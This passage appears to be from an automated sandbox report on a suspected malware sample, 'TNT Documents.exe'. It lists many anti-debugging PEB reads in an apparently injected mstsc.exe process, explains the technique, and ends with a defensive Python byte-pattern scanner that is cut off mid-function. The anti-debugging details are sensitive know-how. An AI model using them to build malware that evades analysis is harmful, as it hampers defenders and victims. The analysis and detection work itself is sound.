          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h]17_2_055C3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BAD30 mov eax, dword ptr fs:[00000030h]17_2_055BAD30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]17_2_0567FDE2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]17_2_0567FDE2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]17_2_0567FDE2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h]17_2_0567FDE2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05668DF1 mov eax, dword ptr fs:[00000030h]17_2_05668DF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]17_2_05636DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]17_2_05636DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]17_2_05636DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov ecx, dword ptr fs:[00000030h]17_2_05636DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]17_2_05636DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h]17_2_05636DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CD5E0 mov eax, dword ptr fs:[00000030h]17_2_055CD5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CD5E0 mov eax, dword ptr fs:[00000030h]17_2_055CD5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056805AC mov eax, dword ptr fs:[00000030h]17_2_056805AC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056805AC mov eax, dword ptr fs:[00000030h]17_2_056805AC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EFD9B mov eax, dword ptr fs:[00000030h]17_2_055EFD9B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EFD9B mov eax, dword ptr fs:[00000030h]17_2_055EFD9B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]17_2_055B2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]17_2_055B2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]17_2_055B2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]17_2_055B2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h]17_2_055B2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]17_2_055E2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]17_2_055E2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]17_2_055E2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h]17_2_055E2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h]17_2_055E1DB5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h]17_2_055E1DB5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h]17_2_055E1DB5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E35A1 mov eax, dword ptr fs:[00000030h]17_2_055E35A1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA44B mov eax, dword ptr fs:[00000030h]17_2_055EA44B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D746D mov eax, dword ptr fs:[00000030h]17_2_055D746D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564C450 mov eax, dword ptr fs:[00000030h]17_2_0564C450
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564C450 mov eax, dword ptr fs:[00000030h]17_2_0564C450
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568740D mov eax, dword ptr fs:[00000030h]17_2_0568740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568740D mov eax, dword ptr fs:[00000030h]17_2_0568740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568740D mov eax, dword ptr fs:[00000030h]17_2_0568740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]17_2_05636C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]17_2_05636C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]17_2_05636C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]17_2_05636C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EBC2C mov eax, dword ptr fs:[00000030h]17_2_055EBC2C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h]17_2_05636CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h]17_2_05636CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h]17_2_05636CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056714FB mov eax, dword ptr fs:[00000030h]17_2_056714FB
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688CD6 mov eax, dword ptr fs:[00000030h]17_2_05688CD6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C849B mov eax, dword ptr fs:[00000030h]17_2_055C849B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688F6A mov eax, dword ptr fs:[00000030h]17_2_05688F6A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CEF40 mov eax, dword ptr fs:[00000030h]17_2_055CEF40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CFF60 mov eax, dword ptr fs:[00000030h]17_2_055CFF60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DF716 mov eax, dword ptr fs:[00000030h]17_2_055DF716
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA70E mov eax, dword ptr fs:[00000030h]17_2_055EA70E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA70E mov eax, dword ptr fs:[00000030h]17_2_055EA70E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568070D mov eax, dword ptr fs:[00000030h]17_2_0568070D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568070D mov eax, dword ptr fs:[00000030h]17_2_0568070D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EE730 mov eax, dword ptr fs:[00000030h]17_2_055EE730
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564FF10 mov eax, dword ptr fs:[00000030h]17_2_0564FF10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564FF10 mov eax, dword ptr fs:[00000030h]17_2_0564FF10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B4F2E mov eax, dword ptr fs:[00000030h]17_2_055B4F2E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B4F2E mov eax, dword ptr fs:[00000030h]17_2_055B4F2E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F37F5 mov eax, dword ptr fs:[00000030h]17_2_055F37F5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C8794 mov eax, dword ptr fs:[00000030h]17_2_055C8794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637794 mov eax, dword ptr fs:[00000030h]17_2_05637794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637794 mov eax, dword ptr fs:[00000030h]17_2_05637794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637794 mov eax, dword ptr fs:[00000030h]17_2_05637794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]17_2_055C7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]17_2_055C7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]17_2_055C7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]17_2_055C7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]17_2_055C7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]17_2_055C7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567AE44 mov eax, dword ptr fs:[00000030h]17_2_0567AE44
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567AE44 mov eax, dword ptr fs:[00000030h]17_2_0567AE44
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]17_2_055DAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]17_2_055DAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]17_2_055DAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]17_2_055DAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]17_2_055DAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C766D mov eax, dword ptr fs:[00000030h]17_2_055C766D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA61C mov eax, dword ptr fs:[00000030h]17_2_055EA61C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA61C mov eax, dword ptr fs:[00000030h]17_2_055EA61C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0566FE3F mov eax, dword ptr fs:[00000030h]17_2_0566FE3F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h]17_2_055BC600
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h]17_2_055BC600
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h]17_2_055BC600
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E8E00 mov eax, dword ptr fs:[00000030h]17_2_055E8E00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671608 mov eax, dword ptr fs:[00000030h]17_2_05671608
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BE620 mov eax, dword ptr fs:[00000030h]17_2_055BE620
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E36CC mov eax, dword ptr fs:[00000030h]17_2_055E36CC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F8EC7 mov eax, dword ptr fs:[00000030h]17_2_055F8EC7
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_0566FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05688ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_056346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_0564FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055BC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055D4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_056441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_056369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055EA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055DC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05672073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05681074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05684015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05684015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_0564B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055B58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055B9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055EF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05633884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05633884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055F90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055BF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055BDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05688B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055BDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_0567131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_056353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_056353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055DDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_05685BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055EB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_0566D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_0567138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_0566B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe, Code function: 17_2_0566B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TNT Documents.exe, Process queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exe, Process queried: DebugPort
          Source: C:\Users\user\Desktop\TNT Documents.exe, Code function: 7_2_00409B50 LdrLoadDll
          Source: C:\Users\user\Desktop\TNT Documents.exe, Memory allocated: page read and write | page guard
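          The entries above are repeated reads of fs:[30h], the PEB pointer stored in the 32-bit TEB. Code loads that pointer and then inspects PEB fields such as BeingDebugged (offset 2) or NtGlobalFlag (offset 0x68, where a heap created under a debugger leaves the 0x70 flag bits set), which is why the sandbox groups these reads with the DebugPort query as anti-debugging. The following scanner is an added example, not Joe Sandbox code and not code taken from the sample: it finds both x86 encodings of the PEB load in a byte buffer, names the destination register the way the entries above do, and reports which PEB field the next instruction touches. The byte string it scans is constructed for the example, not extracted from mstsc.exe; the DebugPort check listed above is an API call (NtQueryInformationProcess) and is outside what a byte-pattern scan can see.

```python
"""Static scan of 32-bit x86 code for PEB reads through the TEB (fs:[30h]).

Added example for this report; not Joe Sandbox code and not code recovered
from the sample. SAMPLE below is constructed to mirror the
"mov eax/ecx, dword ptr fs:[00000030h]" entries and is not taken from mstsc.exe.
"""
import re
from typing import Dict, List, Optional

# FS segment override (0x64) followed by a 32-bit load of TEB offset 0x30 (the PEB pointer).
#   64 A1 30 00 00 00       mov eax, dword ptr fs:[30h]   (moffs32 short form, eax only)
#   64 8B /r 30 00 00 00    mov r32, dword ptr fs:[30h]   (ModRM mod=00 rm=101 -> disp32)
# ModRM for the second form is 0x05 | (reg << 3): 05 0D 15 1D 25 2D 35 3D.
PEB_LOAD = re.compile(
    rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00"
)
REG_NAMES = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# PEB fields anti-debug / anti-sandbox code reads right after loading the pointer.
PEB_FIELDS = {
    0x02: "BeingDebugged",
    0x0C: "Ldr",
    0x10: "ProcessParameters",
    0x18: "ProcessHeap",
    0x68: "NtGlobalFlag",   # 0x70 set here means the heap was created under a debugger
}

# One-byte opcodes whose following byte is a ModRM we can test for [reg+disp8]:
# mov r32,r/m32 / mov r8,r/m8 / grp1 r/m8,imm8 (cmp) / test r/m8,imm8 / cmp r8,r/m8 / cmp r32,r/m32
ONE_BYTE_MEM_OPS = {0x8B, 0x8A, 0x80, 0xF6, 0x3A, 0x3B}


def _following_field(code: bytes, pos: int, reg: int, window: int = 12) -> Optional[str]:
    """Heuristic: first [reg+disp8] access within `window` bytes after `pos`.

    No full decoder here; we slide byte by byte over a short window, which is
    enough for the tight load-then-test sequences this targets.
    """
    want = 0x40 | reg                                   # ModRM mod=01 (disp8), rm=reg
    for i in range(pos, min(pos + window, len(code))):
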